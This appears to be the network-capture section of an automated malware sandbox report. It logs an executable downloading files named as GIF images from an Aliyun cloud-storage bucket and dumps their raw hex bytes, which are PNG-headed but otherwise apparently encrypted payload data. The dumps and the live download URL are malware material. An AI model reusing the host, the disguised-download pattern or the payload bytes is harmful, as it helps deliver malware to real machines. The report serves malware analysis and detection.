                                              2025-01-05 09:11:23 UTC4096INData Raw: ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 55
                                              Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`U
                                              2025-01-05 09:11:23 UTC4096INData Raw: d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 92
                                              Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                                              2025-01-05 09:11:23 UTC4096INData Raw: d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 17
                                              Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                                              2025-01-05 09:11:23 UTC4096INData Raw: 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a 58
                                              Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_X
                                              2025-01-05 09:11:23 UTC4096INData Raw: 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 52
                                              Data Ascii: Z~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJLR
                                              2025-01-05 09:11:23 UTC4096INData Raw: 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd 19
                                              Data Ascii: WUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.66276239.103.20.344432300C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              TimestampBytes transferredDirectionData
                                              2025-01-05 09:11:25 UTC111OUTGET /b.gif HTTP/1.1
                                              User-Agent: GetData
                                              Host: msd1sq.oss-cn-beijing.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:11:25 UTC546INHTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:11:25 GMT
                                              Content-Type: image/gif
                                              Content-Length: 125333
                                              Connection: close
                                              x-oss-request-id: 677A4CBD35EB263636986A44
                                              Accept-Ranges: bytes
                                              ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                              Last-Modified: Sat, 04 Jan 2025 09:22:48 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 10333201072197591521
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000104
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                              x-oss-server-time: 3
                                              2025-01-05 09:11:25 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                              Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                              2025-01-05 09:11:25 UTC4096INData Raw: 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19 9a
                                              Data Ascii: _X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                                              2025-01-05 09:11:25 UTC4096INData Raw: 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0 dd
                                              Data Ascii: mkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                                              2025-01-05 09:11:25 UTC4096INData Raw: 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9 93
                                              Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                              2025-01-05 09:11:25 UTC4096INData Raw: d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7 90
                                              Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                                              2025-01-05 09:11:25 UTC4096INData Raw: 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4 a1
                                              Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                              2025-01-05 09:11:25 UTC4096INData Raw: 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2 b9
                                              Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                                              2025-01-05 09:11:25 UTC4096INData Raw: 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d ac
                                              Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                              2025-01-05 09:11:25 UTC4096INData Raw: 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8 14
                                              Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                              2025-01-05 09:11:25 UTC4096INData Raw: 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf 52
                                              Data Ascii: mHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJR


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.66277439.103.20.344432300C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              TimestampBytes transferredDirectionData
                                              2025-01-05 09:11:27 UTC111OUTGET /c.gif HTTP/1.1
                                              User-Agent: GetData
                                              Host: msd1sq.oss-cn-beijing.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:11:28 UTC546INHTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:11:27 GMT
                                              Content-Type: image/gif
                                              Content-Length: 10681
                                              Connection: close
                                              x-oss-request-id: 677A4CBF7A62AC31309C0E73
                                              Accept-Ranges: bytes
                                              ETag: "10A818386411EE834D99AE6B7B68BE71"
                                              Last-Modified: Sat, 04 Jan 2025 09:22:47 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 10287299869673359293
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000104
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                              x-oss-server-time: 13
                                              2025-01-05 09:11:28 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                              Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                              2025-01-05 09:11:28 UTC4096INData Raw: 4d cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66
                                              Data Ascii: MbZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf
